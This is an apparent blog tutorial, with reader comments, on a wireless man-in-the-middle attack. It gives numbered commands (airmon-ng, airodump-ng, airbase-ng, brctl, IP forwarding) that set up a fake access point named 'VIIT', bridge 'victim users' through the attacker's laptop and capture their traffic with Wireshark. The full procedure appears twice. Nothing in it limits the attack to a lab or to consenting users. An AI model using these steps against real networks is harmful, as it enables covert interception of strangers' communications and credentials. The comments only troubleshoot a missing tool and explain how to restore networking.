In this tutorial we will perform MITM attack.
To perform Man-in-the-Middle (MITM) attack, we will create a fake access point on or laptop and monitor traffic of victim users connected to our laptop. We forward traffic of victim users to the servers therefore, they will be able to access resources on the network. Whereas all there access occurs through our laptop, hence we will be able to see all their communications.
Steps to perform MITM attack:
1. First check for wireless devices on your computer.
$ airmon-ng
2. Now create a Wireless monitoring interfaces:
$ airmon-ng start wlan0
3. Monitor what's on the wireless network such as access points in the neighborhood, wireless devices, channel used, etc
$ airodump-ng mon0
4. Create and launch our own access point (fake access point)
$ airbase-ng --essid VIIT -c 11 mon0
SSID of our access point will be "VIIT" and it is running on channel 11.
5. Verfiy details of logical access point interface
$ ifconfig at0
6. Create a bridge interface
$ brctl addbr myBridge
7. Now, associate real interfaces (eth0 and at0) to bridge interfaces
$ brctl addif myBridge eth0
$ brctl addif myBridge at0
8. Verfiy details of new bridge interface
$ brctl show
9. Remove the IP address of eth0 and at0 interfaces
$ ifconfig eth0 0.0.0.0 up
$ ifconfig at0 0.0.0.0 up
10. Assign IP address to bridge interface we have created earlier. You can use your old eth0 IP address or assign any IP free address on your network
$ ifconfig myBridge 10.10.10.1/8 up
11. Enable IP forwarding on your computer. In other word, your computer will work as a router. IT will perform NATing.
$ echo 1 > /proc/sys/net/ipv4/ip_forward
12. Now use Wireshark tool and monitor traffic of users associated with your fake wireless Access point.
To perform Man-in-the-Middle (MITM) attack, we will create a fake access point on or laptop and monitor traffic of victim users connected to our laptop. We forward traffic of victim users to the servers therefore, they will be able to access resources on the network. Whereas all there access occurs through our laptop, hence we will be able to see all their communications.
Steps to perform MITM attack:
1. First check for wireless devices on your computer.
$ airmon-ng
2. Now create a Wireless monitoring interfaces:
$ airmon-ng start wlan0
3. Monitor what's on the wireless network such as access points in the neighborhood, wireless devices, channel used, etc
$ airodump-ng mon0
4. Create and launch our own access point (fake access point)
$ airbase-ng --essid VIIT -c 11 mon0
SSID of our access point will be "VIIT" and it is running on channel 11.
5. Verfiy details of logical access point interface
$ ifconfig at0
6. Create a bridge interface
$ brctl addbr myBridge
7. Now, associate real interfaces (eth0 and at0) to bridge interfaces
$ brctl addif myBridge eth0
$ brctl addif myBridge at0
8. Verfiy details of new bridge interface
$ brctl show
9. Remove the IP address of eth0 and at0 interfaces
$ ifconfig eth0 0.0.0.0 up
$ ifconfig at0 0.0.0.0 up
10. Assign IP address to bridge interface we have created earlier. You can use your old eth0 IP address or assign any IP free address on your network
$ ifconfig myBridge 10.10.10.1/8 up
11. Enable IP forwarding on your computer. In other word, your computer will work as a router. IT will perform NATing.
$ echo 1 > /proc/sys/net/ipv4/ip_forward
12. Now use Wireshark tool and monitor traffic of users associated with your fake wireless Access point.
Friend.. #brctl tool is not longer available in Kali. Then how it is ?
ReplyDeletebash: brctl: command not found?
ReplyDeletesudo apt-get install bridge-utils
DeleteHow do i restore normale functionality?
ReplyDeleteI can delete the bridge with "brctl delbr myBridge" after I stopped it with "ifconfig myBridge down".
How do I undo the changes done by "ifconfig eth0 0.0.0.0 up" ?
I'm sure you have figured it out but for anyone elses reference either bring myBridge up by the command: ifconfig myBridge up, then delete the bridge myBridge with the command: brctl delbr myBridge and confirm the deletion with brctl show. Now you shouldn't have to undo any changes to eth0 after, the DHCP server on your network should automatically issue you a new ip when you reconnect, bring eth0 down then back up or you can manually renew your ip lease.
ReplyDelete